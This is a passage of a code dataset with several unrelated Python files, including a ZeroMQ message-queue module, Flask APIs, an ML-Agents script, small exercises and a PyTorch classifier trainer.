dictionary.\n\t\"\"\"\n\n\tdef __init__(self, channel=None, message=None, hops=0, source=None, time=None, id=None):\n\t\t\"\"\"\n\t\tConstructor will create a new empty :class:`Message` add set any of the fields\n\t\tprovided in the parameter list.\n\n\t\t:param channel: channel source or destination\n\t\t:type channel: string\n\n\t\t:param message: body of message\n\t\t:type message: string\n\n\t\t:param hops: number software hops traversed\n\t\t:type hops: int\n\n\t\t:param source: source host (usually an IP address)\n\t\t:type source: string\n\n\t\t:param time: text timestamp\n\t\t:type time: string\n\n\t\t:param id: unique message identifier\n\t\t:type id: int\n\n\t\t:returns: a new :class:`Message`\n\t\t\"\"\"\n\t\tself.channel = channel\n\t\tself.message = message\n\t\tself.hops = hops\n\t\tself.source = source\n\t\tself.time = time\n\t\tself.id\t = id\n\n\tdef getChannel(self):\n\t\t\"\"\"\n\t\t:returns: channel name\n\t\t\"\"\"\n\t\treturn str(self.channel)\n\n\tdef setChannel(self, channel):\n\t\t\"\"\"\n\t\tSet the channel name\n\n\t\t:param channel: channel name\n\t\t:param channel: string\n\t\t\"\"\"\n\t\tself.channel = channel\n\n\tdef getMessage(self):\n\t\t\"\"\"\n\t\t:returns: message text\n\t\t\"\"\"\n\t\treturn self.message\n\n\tdef setMessage(self, message):\n\t\t\"\"\"\n\t\tSets the message text\n\t\t\n\t\t:param message: text\n\t\t:type message: string\n\t\t\"\"\"\n\t\tself.message = message\n\n\tdef getHops(self):\n\t\t\"\"\"\n\t\t:returns: number of software hops \n\t\t\"\"\"\n\t\treturn self.hops\n\n\tdef getSource(self):\n\t\t\"\"\"\n\t\t:returns: source address\n\t\t\"\"\"\n\t\treturn self.source\n\n\tdef setSource(self, addr):\n\t\t\"\"\"\n\t\tSet the source host address. This address can be a hostname\n\t\tor an IP Address.\n\t\t\n\t\t:param addr: source address\n\t\t:type addr: string\n\t\t\"\"\"\n\t\tself.source = addr\n\n\tdef getTime(self):\n\t\t\"\"\"\n\t\t:returns: timestamp\n\t\t\"\"\"\n\t\treturn self.time\n\n\tdef setTime(self, t):\n\t\t\"\"\"\n\t\tSets the timestamp. Timestamps should be human readable\n\t\tand reflect the time the message was first inserted into\n\t\tthe message queue.\n\n\t\t:param t: timestamp\n\t\t:type t: string\n\t\t\"\"\"\n\t\tself.time = t\n\n\tdef getID(self):\n\t\t\"\"\"\n\t\t:returns: :class:`Message` ID\n\t\t\"\"\"\n\t\treturn self.id\n\n\tdef setID(self, id):\n\t\t\"\"\"\n\t\tSets the numeric identifier.\n\t\tIdentifiers must be unique for a given channel and host.\n\n\t\t:param id: numeric identifier\n\t\t:type id: int\n\t\t\"\"\"\n\t\tself.id = id\n\n\tdef addHop(self):\n\t\t\"\"\"\n\t\tIncrements the hop count for the :class:`Message`. A hop is\n\t\tdefined as a software hop not a physical network hop. \n\t\tEvery time an application receives and retransmits a message the\n\t\thop should be incremented. \n\t\tThis value is used to debugging.\n\t\t\"\"\"\n\t\tself.hops += 1\n\n\tdef getDict(self, channel=True):\n\t\t\"\"\"\n\t\tReturns a dictionary of all the :class:`Message` fields.\n\t\tBy default this will include the name of the message\n\t\tchannel which is correct for most uses.\n\t\tHowever, when the message is going to be published on a\n\t\tzeromq pub/sub socket the channel name is already prepended to\n\t\tthe string containing the message.\n\t\tFor this case set the *channel* parameter to False.\n\n\t\t:param channel: include channel field\n\t\t:type channel: bool\n\t\t:returns: python dictionary\n\t\t\"\"\"\n\t\td = {}\n\t\tif channel:\n\t\t\tif self.channel:\n\t\t\t\td['channel'] = self.channel\n\t\tif self.id is not None:\n\t\t\td['id'] = self.id\n\t\tif self.message:\n\t\t\td['message'] = self.message\n\t\tif self.hops:\n\t\t\td['hops'] = self.hops\n\t\tif self.source:\n\t\t\td['source'] = self.source\n\t\tif self.time:\n\t\t\td['time'] = self.time\n\t\treturn d\n\n\tdef dumps(self, channel=True):\n\t\t\"\"\"\n\t\tCreates a dictionary of all the :class:`Message` fields and returns\n\t\tit as a json string. \n\t\tJust as with :func:`getDict` the name of the message channel\n\t\tcan by excluded from the resulting dictionary.\n\n\t\t:param channel: include channel field\n\t\t:type channel: bool\n\t\t:returns: json representation of the message\n\t\t\"\"\"\n\t\td = self.getDict(channel)\n\t\treturn json.dumps(d)\n\n\tdef loads(self, packet):\n\t\t\"\"\"\n\t\tParses the *packet* and update all the included\n\t\tmessage fields for this :class:`Message`.\n\n\t\t:param packet: json representation of a message\n\t\t:type packet: string\n\t\t\"\"\"\n\t\td = json.loads(packet.decode())\n\t\tif 'channel' in d:\n\t\t\tself.channel = d['channel']\n\t\tif 'id' in d:\n\t\t\tself.id = d['id']\n\t\tif 'message' in d:\n\t\t\tself.message = d['message']\n\t\tif 'hops' in d:\n\t\t\tself.hops = d['hops']\n\t\tif 'source' in d:\n\t\t\tself.source = d['source']\n\t\tif 'time' in d:\n\t\t\tself.time = d['time']\n\n\nclass Subscriber(threading.Thread):\n\t\"\"\"\n\tA Subscriber thread is used by application to subscribe and unsubscribe\n\tto channels on a message queue on exactly one host.\n\tFor every :class:`Message` received a :func:`callback` is invoked and the\n\tmessage is handled according to the derived class implementation.\n\tOnce the subscribe thread is started it will not exit.\n\t\"\"\"\n\n\tdef __init__(self, context, host='localhost'):\n\t\t\"\"\"\n\t\tConstructor creates a new :class:`Subscriber` and connects to the\n\t\tzeromq subcribe socket on the remote *host*.\n\n\t\t:param context: zeromq context\n\t\t:param host: name of publishing host\n\t\t:type host: string\n\n\t\t:returns: a new :class:`Subscriber`\n\t\t\"\"\"\n\t\tthreading.Thread.__init__(self)\n\n\t\tself.sub = context.socket(zmq.SUB)\n\t\tself.sub.connect('tcp://%s:%d' % (host, ports.subscribe))\n\n\tdef subscribe(self, channel):\n\t\t\"\"\"\n\t\tSubscribes to all channels that start with the\n\t\tsub-string *channel*.\n\n\t\t:param channel: pattern of channels to subscribe\n\t\t:type channel: string\n\t\t\"\"\"\n\t\tself.sub.setsockopt_string(zmq.SUBSCRIBE, channel)\n\n\tdef unsubscribe(self, channel):\n\t\t\"\"\"\n\t\tUnsubscribe from the given *channel*. Subscriptions are\n\t\treference counted so you must unsubscribe once for every\n\t\ttime you :func:`subscribe`.\n\n\t\t:param channel: channel name\n\t\t:type channel: string\n\t\t\"\"\"\n\t\tself.sub.setsockopt_string(zmq.UNSUBSCRIBE, channel)\n\t\t\n\tdef run(self):\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tchannel, pkt = self.sub.recv_multipart()\n\t\t\t\tmsg = Message(channel.decode())\n\t\t\t\tmsg.loads(pkt)\n\t\t\texcept:\n\t\t\t\tcontinue\n\t\t\tif 'STACKDEBUG' in os.environ:\n\t\t\t\tprint (msg.getDict())\n\t\t\tself.callback(msg)\n\n\n\tdef callback(self, message):\n\t\t\"\"\"\n\t\tCalled for every received message. All derived classes must\n\t\timplement this method. The default behavior does nothing.\n\n\t\t:param message: received message\n\t\t:type message: stack.mq.Message\n\t\t\"\"\"\n\t\tpass\n\n\nclass Receiver(threading.Thread):\n\t\"\"\"\n\tA Receiver thread listens on a UDP socket and receives both\n\ttext messages and :class:`Message` objects.\n\tFor every message received a :func:`callback` is invoked and the\n\tmessage is handled according to the derived class implementation.\n\tOnce the Receiver thread is started it will not exit.\n\t\"\"\"\n\n\tdef __init__(self):\n\t\tthreading.Thread.__init__(self)\n\n\t\tself.rx = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\tself.rx.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\t\tself.rx.bind(('', ports.publish))\n\n\tdef run(self):\n\t\twhile True:\n\t\t\tpkt, addr = self.rx.recvfrom(65565)\n\n\t\t\t# All clients send text ( )\n\t\t\t# But, internally all messages are json. To allow\n\t\t\t# arbitrary wiring of daemons we need to accept\n\t\t\t# json as input also.\n\t\t\t#\n\t\t\t# Note the callback() always pushes data as\n\t\t\t# stack.mq.Message objects. This is the only\n\t\t\t# part of the code where we handle receiving \n\t\t\t# unstructured data.\n\t\t\t#\n\t\t\t# Design point here was to keep the clients \n\t\t\t# simple so we don't need an API to write to\n\t\t\t# the message queue.\n\n\t\t\tmsg = None\n\t\t\ttm = time.asctime()\n\t\t\ttry:\n\t\t\t\tmsg = Message(time=tm)\n\t\t\t\tmsg.loads(pkt)\n\t\t\texcept:\n\t\t\t\ttry:\n\t\t\t\t\t(c, m) = pkt.split(' ', 1)\n\t\t\t\t\tmsg = Message(c, m, time=tm)\n\t\t\t\texcept:\n\t\t\t\t\tpass # drop bad message\n\t\t\tif msg:\n\t\t\t\tif not msg.getSource() and addr[0] != '127.0.0.1':\n\t\t\t\t\tmsg.setSource(addr[0])\n\t\t\t\tself.callback(msg)\n\n\tdef callback(self, message):\n\t\t\"\"\"\n\t\tCalled for every received message. All derived classes must\n\t\timplement this method. The default behavior does nothing.\n\n\t\t:param message: received message\n\t\t:type message: stack.mq.Message\n\t\t\"\"\"\n\t\tpass\n\n\n\n\n\n\n","sub_path":"common/src/stack/mq/pylib/mq/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"121720340","text":"from mlagents_envs.environment import UnityEnvironment\r\nfrom mlagents_envs.base_env import ActionTuple\r\nfrom mlagents_envs.side_channel.engine_configuration_channel import EngineConfigurationChannel\r\nfrom mlagents_envs.registry import default_registry\r\n\r\nimport random\r\nimport numpy as np\r\nimport sys\r\nfrom evolution import params_reshape, build_net, evaluate_population\r\n\r\nl1_size = 16 # number of neurons in 1st layer\r\nl2_size = 32 # number of neurons in 2nd layer\r\nPOP_SIZE = 12 # population size\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n # This is a non-blocking call that only loads the environment.\r\n print (\"Script started. Please start Unity environment to start training proccess.\")\r\n engine_channel = EngineConfigurationChannel()\r\n # env = UnityEnvironment( side_channels=[engine_channel])\r\n env = default_registry[\"3DBall\"].make(side_channels = [engine_channel])\r\n engine_channel.set_configuration_parameters(time_scale = 1, width=1920, height=1080) # control time scale 0.5 - half speed, 10. - 10x time\r\n # Start interacting with the environment.\r\n env.reset()\r\n # Info about our environment ---------------------\r\n print (f\"number of behaviours: {len(list(env.behavior_specs) )}\")\r\n behavior_name = list(env.behavior_specs)[0]\r\n spec = env.behavior_specs[behavior_name]\r\n action_spec = spec.action_spec\r\n decision_steps, terminal_steps = env.get_steps(behavior_name)\r\n # Examine the number of observations per Agent\r\n print(\"Number of observations : \", len(spec.observation_specs))\r\n print(\" observations : \", spec.observation_specs)\r\n # Is the Action continuous or multi-discrete ?\r\n if action_spec.is_continuous():\r\n print(\"The action is continuous\")\r\n print(f\"There are {action_spec.continuous_size} action(s)\")\r\n # Create neural network structure and get its shape and flat params (weights, biases) for continues actions (-1;1)\r\n net_shapes, net_params = build_net(decision_steps.obs[0].shape[1],\r\n action_spec.continuous_size, l1_size, l2_size)\r\n\r\n # print (spec.action_spec.random_action() )\r\n if action_spec.is_discrete():\r\n print(\"The action is discrete\")\r\n # How many actions are possible ?\r\n print(f\"There are {action_spec.discrete_size} action(s)\")\r\n for action, branch_size in enumerate(action_spec.discrete_branches):\r\n print(f\"Action number {action} has {branch_size} different options\")\r\n # Create neural network structure and get its shape and flat params (weights, biases) for continues actions (-1;1)\r\n net_shapes, net_params = build_net(decision_steps.obs[0].shape[1],\r\n action_spec.discrete_branches[0], l1_size, l2_size)\r\n \r\n for index, shape in enumerate(decision_steps.obs):\r\n # if len(shape) == 1:\r\n print(f\"obs shape: {decision_steps.obs[index].shape}\")\r\n print(f\"First vector observations : {decision_steps.obs[index][0,:]} \\n shape: {decision_steps.obs[index][0].shape}\", )\r\n for index, shape in enumerate(terminal_steps.obs):\r\n # if len(shape) == 1:\r\n print(f\"terminal obs shape: {terminal_steps.obs[index].shape}\")\r\n print(f\"First vector observations terminal : {terminal_steps.obs[index]}\\\r\n \\n shape: {terminal_steps.obs[index].shape}\", )\r\n # Info about our environment ---------------------\r\n param = np.loadtxt(sys.argv[1])\r\n # p = params_reshape(net_shapes, param)\r\n while True:\r\n ep_reward = 0\r\n pop = [param] * POP_SIZE\r\n episode_rewards = evaluate_population(pop, env, net_shapes, inference=True)\r\n print (f\"average reward: {sum(episode_rewards)/len(episode_rewards)}\")\r\n finally:\r\n env.close()","sub_path":"evo_inference.py","file_name":"evo_inference.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"356221206","text":"#!7usr/bin/python3\n\"\"\"\n-*- Coding UTF-8 -*-\n\"\"\"\n\nfrom flask import jsonify, abort, request, make_response\nfrom api.v1.views import app_views\nfrom models import storage\nfrom models.place import Place\nfrom models.amenity import Amenity\n\nopt_route = {'strict_slashes': False}\n\n\n@app_views.route('/places//amenities', methods=['GET'], **opt_route)\ndef get_amenities_by_place(place_id):\n \"\"\" Retrieves the list of all Amenities objects of a place \"\"\"\n place = storage.get(Place, place_id)\n\n if not place:\n abort(404)\n\n amenities = [amenity.to_dict() for amenity in place.amenities]\n\n return jsonify(amenities), 200\n\n\n@app_views.route(\n '/places//amenities/',\n methods=['DELETE'], **opt_route)\ndef delete_amenity_to_place(place_id, amenity_id):\n \"\"\" Deletes a Amenity object to a Place. \"\"\"\n place = storage.get(Place, place_id)\n amenity = storage.get(Amenity, amenity_id)\n\n if not place or not amenity:\n abort(404)\n\n for amenity in place.amenities:\n amenity_ = amenity.to_dict()\n if amenity_.get('id') == amenity_id:\n storage.delete(amenity)\n\n storage.save()\n\n return make_response(jsonify({}), 200)\n","sub_path":"api/v1/views/places_amenities.py","file_name":"places_amenities.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"59802873","text":"# Ask the user for two lowercase words (w1, w2) as input. Create a function called create_anagram(w1, w2).\n# The only allowed operation is to remove a character from any string. \n# Find minimum number of characters to be deleted to make both the strings anagram?\n\n# Input:\n# Output:\n# function to check if two strings are \n# anagram or not \ndef check(s1, s2): \n \n # the sorted strings are checked \n if(sorted(s1)== sorted(s2)): \n print(\"The strings are anagrams.\") \n else: \n res = [] \n for i in s1:\n for j in s2:\n if i == j:\n res.append(i)\n list(s1).remove(i)\n list(s2).remove(j)\n print(s1,s2)\n break\n # break \n\n print(f\"The strings aren't anagrams: {str(res)}\") \n \n# driver code \nword1 =\"good\"\nword2 =\"doing\"\ncheck(word1, word2)\n","sub_path":"Class_Assignment/CA09/q7.py","file_name":"q7.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"426309751","text":"class Solution:\n def sumEvenAfterQueries(self, A: List[int], queries: List[List[int]]) -> List[int]:\n res = []\n for i in queries:\n val = i[0]\n index = i[1]\n A[index] += val\n even_nums = []\n for num in A:\n if num % 2 ==0:\n even_nums.append(num)\n res.append(sum(even_nums))\n return(res)\n","sub_path":"985-sum-of-even-nums-after-queries/sum-of-even-numbers-after-queries.py","file_name":"sum-of-even-numbers-after-queries.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"204154990","text":"import os\n\nimport pandas as pd\nimport numpy as np\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine\n\nfrom flask import Flask, jsonify, render_template\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\n#################################################\n# Database Setup\n#################################################\n\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///project.sqlite\"\ndb = SQLAlchemy(app)\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(db.engine, reflect=True)\n# Save references to each table\n#Forecast = Base.classes.forecast\nDataSet = Base.classes.dataset\n\n#Create a session\nsession=Session(db.engine)\n\n@app.route(\"/\")\ndef index():\n \"\"\"Return the homepage.\"\"\"\n return render_template(\"index.html\")\n\n\n@app.route(\"/dashboard\")\ndef comparison():\n \"\"\"Return dashboard.html.\"\"\"\n return render_template(\"dashboard.html\")\n\n@app.route(\"/map\")\ndef map():\n \"\"\"Return map.html.\"\"\"\n return render_template(\"map.html\")\n\n\n@app.route(\"/names\")\ndef names():\n \"\"\"Return a list of cities names.\"\"\"\n\n # Return a list of the unique city names\n results=(session.query(DataSet.city).distinct()) \n return jsonify(list(results))\n\n@app.route(\"/cities/\")\ndef cities(city):\n \n results=(session.query(DataSet.city,DataSet.year,DataSet.price_per_sqft,DataSet.forecast_YoY_pct_change, DataSet.total_homes, DataSet.unoccupied_homes, DataSet.monthly_rental_price, DataSet.housing_increase_units)\n .filter(DataSet.city==city)\n .all())\n city_list=[]\n \n for r in results:\n #city_metadata = {}\n #ity_metadata[\"city\"]=result[0]\n #city_metadata[\"date\"]=result[1]\n #city_metadata[\"price\"]=result[2]\n #city_list.append(city_metadata)\n city_list.append({\"city\": r[0], \"date\": r[1], \"price\": r[2], \"forecast\": r[3], \"totalhomes\": r[4], \"unoccupied\": r[5], \"rental\": r[6], \"units\": r[7]})\n print(city_list)\n return jsonify(city_list)\n\n\n\n@app.route(\"/mapdata\")\ndef map_data():\n \n map_data = (session.query(DataSet.city, DataSet.latitude, DataSet.longitude, DataSet.price_per_sqft, \n DataSet.monthly_rental_price,\n DataSet.population, DataSet.population_density, \n DataSet.population_increase_pct, DataSet.violent_crime_rate, \n DataSet.property_crime_rate, DataSet.total_homes, DataSet.occupied_homes, \n DataSet.unoccupied_homes, DataSet.housing_increase_pct, DataSet.vacancy_rate_pct, \n DataSet.persons_per_household).filter(DataSet.year == 2018).all())\n\n\n house_data = []\n\n for row in map_data:\n info_dict = {}\n info_dict[\"city\"] = row.city\n info_dict[\"latitude\"] = row.latitude\n info_dict[\"longitude\"] = row.longitude\n info_dict[\"price_per_sqft\"] = row.price_per_sqft\n info_dict[\"monthly_rental_price\"] = row.monthly_rental_price\n info_dict[\"population\"] = row.population\n info_dict[\"population_density\"] = row.population_density\n info_dict[\"population_increase_pct\"] = row.population_increase_pct\n info_dict[\"violent_crime_rate\"] = row.violent_crime_rate\n info_dict[\"property_crime_rate\"] = row.property_crime_rate\n info_dict[\"total_homes\"] = row.total_homes\n info_dict[\"occupied_homes\"] = row.occupied_homes\n info_dict[\"unoccupied_homes\"] = row.unoccupied_homes\n info_dict[\"housing_increase_pct\"] = row.housing_increase_pct\n info_dict[\"vacancy_rate_pct\"] = row.vacancy_rate_pct\n info_dict[\"persons_per_household\"] = row.persons_per_household\n house_data.append(info_dict)\n\n\n return jsonify(house_data)\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, port=5005)","sub_path":"Project2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"142217362","text":"# -*- coding: utf-8 -*-\nimport pickle\nfrom views import db\nfrom models import Product\nimport sqlalchemy\n\ndbfile = open('table_data', 'rb')\ndata = pickle.load(dbfile)\n\nfor i in range(len(data)):\n\tfor j in range(len(data[i])):\n\t\tif 'title' in data[i][j]:\n\t\t\ttitle = data[i][j]['title']\n\t\t\tcontinue\n\t\telif 'sub_title' in data[i][j]:\n\t\t\tsub_title = data[i][j]['sub_title']\n\t\t\tcontinue\n\t\tname, kkal, prots, fats, carbs = data[i][j]['name'], \\\n\t\t\tdata[i][j]['kkal'].split()[0], data[i][j]['proteins'].split()[0], \\\n\t\t\tdata[i][j]['fats'].split()[0], data[i][j]['carbohydrates'].split()[0]\n\t\tif kkal != '?' and prots != '?' and fats != '?' and carbs != '?':\n\t\t\tprod = Product(name, title, sub_title, kkal, prots, fats, carbs)\n\t\t\tdb.session.add(prod)\n\t\t\tdb.session.commit()","sub_path":"project/make_prod_db.py","file_name":"make_prod_db.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"634045748","text":"import numpy as np\r\nimport pandas as pd\r\nfrom collections import deque\r\n\r\n\r\n# List demo\r\nlist_1 = [3,2,1,4,7,6,5,8,9]\r\n\r\nprint(list_1)\r\nprint(type(list_1))\r\nlist_1.append(10)\r\nprint(list_1)\r\nsorted_list = sorted(list_1)\r\nprint(sorted_list)\r\nprint(list_1)\r\nlist_1.sort()\r\nprint(list_1)\r\nlist_1.pop()\r\nprint(list_1)\r\n\r\n# deque demo\r\ndouble_queue = deque([3,1,2,5])\r\nprint(double_queue)\r\ndouble_queue.append(4)\r\nprint(double_queue)\r\ndouble_queue.appendleft(0)\r\nprint(double_queue)\r\ndouble_queue.pop()\r\nprint(double_queue)\r\ndouble_queue.popleft()\r\nprint(double_queue)\r\nprint(sorted(double_queue))\r\n\r\n# dictionary demo\r\ndictionary = {'Brand': 'Ford', 'Model': 'Focus', 'Year': 2018}\r\nprint(dictionary)\r\nprint(dictionary['Brand'])\r\ndictionary['Category'] = 'Sedan'\r\nprint(dictionary)\r\ndictionary['Colours'] = ['red', 'yellow', 'black', 'white']\r\nprint(dictionary)\r\nprint(dictionary.keys())\r\nprint(dictionary.items())\r\n\r\nfor (key, item) in dictionary.items():\r\n print('The key is: ', key, ' , and item is: ', item)\r\n\r\n\r\n# tree demo\r\nclass tree:\r\n\r\n def __init__(self, data):\r\n\r\n self.left = None\r\n self.right = None\r\n self.data = data\r\n\r\n def PrintTree(self):\r\n if self.left:\r\n self.left.PrintTree()\r\n print(self.data),\r\n if self.right:\r\n self.right.PrintTree()\r\n\r\n def insert(self, data):\r\n # compare current value with parent node\r\n if self.data:\r\n if data < self.data:\r\n if self.left is None:\r\n self.left = tree(data)\r\n else:\r\n self.left.insert(data)\r\n elif data > self.data:\r\n if self.right is None:\r\n self.right = tree(data)\r\n else:\r\n self.right.insert(data)\r\n else:\r\n self.data = data\r\n\r\n # dfs algorithm\r\n # inorder treversal\r\n # Left -> root -> Right\r\n def inorder(self,root):\r\n res=[]\r\n if root:\r\n res = self.inorder(root.left)\r\n res.append(root.data)\r\n res = res + self.inorder(root.right)\r\n return res\r\n # preorder Treversal\r\n # Root -> Left -> Right\r\n def preorder(self, root):\r\n res = []\r\n if root:\r\n res.append(root.data)\r\n res = res + self.preorder(root.left)\r\n res = res + self.preorder(root.right)\r\n return res\r\n # Postorder Treverse\r\n # Left _> Right -> Root\r\n def postorder(self, root):\r\n res = []\r\n if root:\r\n res = self.postorder(root.left)\r\n res = res + self.postorder(root.right)\r\n res.append(root.data)\r\n return res\r\n\r\n# bfs to be continued\r\n# def bfs(self,visited, node):\r\n\r\n\r\n\r\n\r\nroot = tree(12)\r\nroot.insert(6)\r\nroot.insert(14)\r\nroot.insert(3)\r\nroot.insert(35)\r\nroot.insert(10)\r\nroot.insert(19)\r\nroot.insert(31)\r\nroot.insert(42)\r\n\r\n# root.PrintTree()\r\nprint(root.inorder(root))\r\nprint(root.preorder(root))\r\nprint(root.postorder(root))","sub_path":"CH2/George/HW1/Practice.py","file_name":"Practice.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"626408391","text":"import logging\nfrom logging.config import dictConfig\nimport time\nimport os\n\n\nclass CACode_log:\n logging = logging\n name = ''\n path = ''\n\n def __init__(self, name):\n self.name = name\n self.path = CACode_log._get_custom_file_name(name)\n dictConfig({\n 'version': 1,\n 'formatters': {'default': {\n 'format': '%(asctime)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s',\n }},\n 'handlers': {\n 'default': {\n 'class': 'logging.StreamHandler',\n 'stream': 'ext://flask.logging.wsgi_errors_stream',\n 'formatter': 'default'\n },\n 'custom': {\n 'class': 'logging.FileHandler',\n 'formatter': 'default',\n 'filename': CACode_log._get_custom_file_name(name),\n 'encoding': 'utf-8'\n },\n },\n 'root': {\n 'level': 'INFO',\n 'handlers': ['custom']\n }\n })\n\n @staticmethod\n def _mkdir(make_dir_path):\n \"\"\"\n 创建文件\n :param make_dir_path: 文件或者文件夹的路路径\n :return:绝对路径\n \"\"\"\n\n path = make_dir_path.strip()\n if not os.path.exists(path):\n os.makedirs(path)\n return path\n\n @staticmethod\n def _get_custom_file_name(name):\n \"\"\"\n 获取日志的绝对路径\n :return:项目路径+当前时间.log\n \"\"\"\n log_dir = name + \"-log\"\n file_name = 'logger-' + \\\n time.strftime('%Y-%m-%d', time.localtime(time.time())) + '.log'\n file_folder = os.path.abspath(os.path.dirname(__file__)) + os.sep + log_dir\n CACode_log._mkdir(file_folder)\n return file_folder + os.sep + file_name\n","sub_path":"cacode_log.py","file_name":"cacode_log.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"422178663","text":"from PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtWidgets import QDialog\nfrom ui.SearchDialog import Ui_SearchDialog\n\n\nclass SearchDialog(QDialog, Ui_SearchDialog):\n def __init__(self):\n super(SearchDialog, self).__init__()\n self.setupUi(self)\n self.setup_connections()\n self.search_string = \"\"\n self.no_results_label.hide()\n\n search = pyqtSignal(str)\n delete = pyqtSignal(str)\n\n def setup_connections(self):\n self.cancel_search_button.clicked.connect(self.hide)\n self.phone_number_box.textChanged.connect(self.on_text_changed)\n self.search_button.clicked.connect(self.emit_signal)\n\n def search_dialog(self):\n self.show()\n self.search_button.setText(\"Search\")\n self.phone_number_box.setFocus()\n\n def delete_dialog(self):\n self.show()\n self.search_button.setText(\"Delete\")\n self.phone_number_box.setFocus()\n\n def hideEvent(self, hide_event):\n self.phone_number_box.clear()\n return super().hideEvent(hide_event)\n\n def on_text_changed(self, text):\n self.search_string = text\n\n def emit_signal(self):\n if self.search_button.text() == \"Search\":\n self.search.emit(self.search_string)\n else:\n self.delete.emit(self.search_string)\n self.hide()\n\n def results(self, results):\n if results:\n self.no_results_label.hide()\n else:\n self.no_results_label.show()\n","sub_path":"src/SearchDialog.py","file_name":"SearchDialog.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"261022333","text":"\n\nimport numpy as np\nfrom torch.utils.data.dataset import random_split\nfrom utils import tensor_to_numpy\nimport json\nfrom DnnDataset import DnnDataset\nfrom DnnNet import DnnNet\n\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport torch\nfrom sklearn.metrics import confusion_matrix\n\n\nclass TrainingClassifier:\n\n\n def __init__(self,metrics_dir,metrics_filename,filepath_filename,batch_size,n_epochs,lr,downsampling=True,upsampling=False,decision_threshold=0.5):\n # torch.manual_seed(1)\n self.metrics_dir=metrics_dir\n self.metrics_filename=metrics_filename\n self.filepath_filename=filepath_filename\n self.batch_size=batch_size\n self.n_epochs=n_epochs\n self.lr=lr\n self.downsampling=downsampling\n self.upsampling=upsampling\n self.decision_threshold=decision_threshold\n\n def load_dataset(self):\n self.data_raw=np.load(self.metrics_dir+self.metrics_filename)\n self.data_raw=dict(self.data_raw)\n\n with open(self.metrics_dir+self.filepath_filename) as data_file:\n self.list_filepath=json.load(data_file)\n\n\n self.dataset=DnnDataset(self.data_raw,self.list_filepath,downsampling=self.downsampling,upsampling=self.upsampling)\n\n\n def load_dataset_alter(self):\n\n self.data_raw = np.load(self.metrics_dir + self.metrics_filename)\n self.data_raw = dict(self.data_raw)\n\n with open(self.metrics_dir + self.filepath_filename) as data_file:\n self.list_filepath = json.load(data_file)\n\n\n def split_dataset_alter(self):\n lendata=len(self.data_raw['vae_embeddings'])\n ratio = 0.6\n train_length = int(lendata * ratio)\n validation_length = int((lendata- train_length) * 0.5)\n test_length = lendata - validation_length - train_length\n\n self.train={}\n self.validation={}\n self.test={}\n for key in self.data_raw.keys():\n self.train[key], self.validation[key], self.test[key]= np.split(self.data_raw[key],[train_length,train_length+validation_length])\n\n\n self.train_dataset=DnnDataset(self.train,self.list_filepath[0:train_length],downsampling=self.downsampling,upsampling=self.upsampling)\n self.validation_dataset = DnnDataset(self.validation, self.list_filepath[train_length:train_length+validation_length], downsampling=False,\n upsampling=False)\n self.test_dataset = DnnDataset(self.test, self.list_filepath[train_length+validation_length:train_length+validation_length+test_length], downsampling=False,\n upsampling=False)\n\n self.train_loader = torch.utils.data.DataLoader(dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True)\n self.validation_loader = torch.utils.data.DataLoader(dataset=self.validation_dataset, batch_size=len(self.validation), shuffle=False)\n self.test_loader = torch.utils.data.DataLoader(dataset=self.test_dataset, batch_size=len(self.test),\n shuffle=False)\n\n self.dataset=self.train_dataset\n\n\n def split_dataset(self):\n\n ratio=0.6\n train_length= int(len(self.dataset)* ratio)\n validation_length=int((len(self.dataset)-train_length)*0.5)\n test_length=len(self.dataset)-validation_length-train_length\n\n self.train,self.validation,self.test=random_split(self.dataset,[train_length,validation_length,test_length])\n\n\n\n\n self.train_loader = torch.utils.data.DataLoader(dataset=self.train, batch_size=self.batch_size, shuffle=True)\n self.test_loader = torch.utils.data.DataLoader(dataset=self.test, batch_size=len(self.test), shuffle=False)\n self.validation_loader = torch.utils.data.DataLoader(dataset=self.test, batch_size=len(self.validation), shuffle=False)\n\n\n\n def train_model(self):\n dnn=DnnNet(deepdata=self.dataset.X_deep)\n # optimizer = optim.Adam(dnn.parameters(), lr=self.lr)\n criterion = F.binary_cross_entropy\n optimizer = optim.Adam(dnn.parameters(), lr=0.001, betas=(0.9, 0.999))\n for epoch in range(self.n_epochs):\n\n for 